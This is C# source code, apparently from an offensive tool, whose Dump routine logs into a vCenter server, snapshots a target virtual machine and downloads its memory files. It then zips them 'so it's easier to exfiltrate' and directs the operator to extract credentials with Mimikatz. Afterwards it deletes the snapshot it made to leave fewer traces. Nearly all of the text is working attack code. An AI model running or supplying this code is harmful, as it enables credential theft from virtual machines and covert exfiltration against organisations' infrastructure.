public TaskInfoState RemoveSnapshot(string snapshot, bool removeChildren, bool consolidate) { ManagedObjectReference morSnapshot = new ManagedObjectReference { @type = "VirtualMachineSnapshot", Value = snapshot }; ManagedObjectReference morTask = _vimService.RemoveSnapshot_Task(morSnapshot, removeChildren, consolidate); MyVMTask myTask = new MyVMTask(_vimService, _pc, morTask); TaskInfo ti = null; TaskInfoState state = myTask.Wait(3000, -1, out ti); return(state); }
static int Dump(DumpOptions options) { try { //Connect to target Connect(options.url, options.username, options.password, null); //Find target VM vm = GetTargetVM(options.targetvm); if (vm is null) { Error(new Exception("Failed to find target VM " + options.targetvm + ", are you sure the name is right?")); } //Create Snapshot if specified, otherwise find existing one ManagedObjectReference snapshot = GetSnapshot(options.targetvm, options.snapshot); //Get information about the snapshot VirtualMachineFileInfo fileInfo = GetProperty <VirtualMachineConfigInfo>(snapshot, "config").files; //Build the objects we need ManagedObjectReference environmentBrowser = GetProperty <ManagedObjectReference>(vm, "environmentBrowser"); ManagedObjectReference datastoreBrowser = GetProperty <ManagedObjectReference>(environmentBrowser, "datastoreBrowser"); //Search for a vmem file ManagedObjectReference task = vim.SearchDatastore_Task(datastoreBrowser, fileInfo.snapshotDirectory, GetHostDatastoreBrowserSearchSpec()); TaskInfo info = GetProperty <TaskInfo>(task, "info"); string state = info.state.ToString(); while (state != "success") { switch (state) { case "error": Error(new Exception("Error searching datastore for snapshot files")); break; case "running": Thread.Sleep(1000); break; } state = GetProperty <TaskInfo>(task, "info").state.ToString(); } HostDatastoreBrowserSearchResults results = (HostDatastoreBrowserSearchResults)GetProperty <TaskInfo>(task, "info").result; //Check at least one vmem exists, which it may not if not using --snapshot FileInfo latestFile = null; if (results.file.Length == 0) { Error(new Exception("Failed to find any .vmem files associated with the VM, despite there being snapshots. Virtual machine memory may not have been captured. Recommend rerunning with --snapshot")); } //Grab the latest .vmem file if there is more than one associated with a VM foreach (FileInfo file in results.file) { if (latestFile == null || DateTime.Compare(file.modification, latestFile.modification) > 0) { latestFile = file; } } //Build the URLs to download directly from datastore string host = options.url.Remove(options.url.Length - 4); string dsName = FindTextBetween(results.folderPath, "[", "]"); string folderPath = results.folderPath.Remove(0, dsName.Length + 3); string vmemURL = host + "/folder/" + folderPath + latestFile.path + "?dcPath=" + datacenterName + "&dsName=" + dsName; string vmsnURL = host + "/folder/" + folderPath + latestFile.path.Replace(".vmem", ".vmsn") + "?dcPath=" + datacenterName + "&dsName=" + dsName; string vmemFile = options.destination.Replace("\"", string.Empty) + @"\" + Path.GetRandomFileName(); string vmsnFile = options.destination.Replace("\"", string.Empty) + @"\" + Path.GetRandomFileName(); string zipFile = options.destination.Replace("\"", string.Empty) + @"\" + Path.GetRandomFileName(); //Make the web requests using (var client = new System.Net.WebClient()) { client.Credentials = new System.Net.NetworkCredential(options.username, options.password); client.Headers.Set(System.Net.HttpRequestHeader.ContentType, "application/octet-stream"); client.CachePolicy = new HttpRequestCachePolicy(HttpRequestCacheLevel.NoCacheNoStore); Log("[x] Downloading " + latestFile.path + " (" + latestFile.fileSize / 1048576 + @"MB) to " + vmemFile + "..."); client.DownloadFile(vmemURL, vmemFile); Log("[x] Downloading " + latestFile.path.Replace(".vmem", ".vmsn") + " to " + vmsnFile + "..."); client.DownloadFile(vmsnURL, vmsnFile); } //Zip up the two downloaded files Log("[x] Download complete, zipping up so it's easier to exfiltrate..."); var zip = ZipFile.Open(zipFile, ZipArchiveMode.Create); zip.CreateEntryFromFile(vmemFile, Path.GetFileName(vmemFile), CompressionLevel.Optimal); zip.CreateEntryFromFile(vmsnFile, Path.GetFileName(vmsnFile), CompressionLevel.Optimal); zip.Dispose(); File.Delete(vmemFile); File.Delete(vmsnFile); System.IO.FileInfo zipFileInfo = new System.IO.FileInfo(zipFile); Log("[x] Zipping complete, download " + zipFile + " (" + zipFileInfo.Length / 1048576 + "MB), rename to .zip, and follow instructions to use with Mimikatz"); //Delete the snapshot we created if needed if (options.snapshot) { Log("[x] Deleting the snapshot we created"); vim.RemoveSnapshot_Task(snapshot, false, true); } } catch (Exception fault) { Error(fault); } return(0); }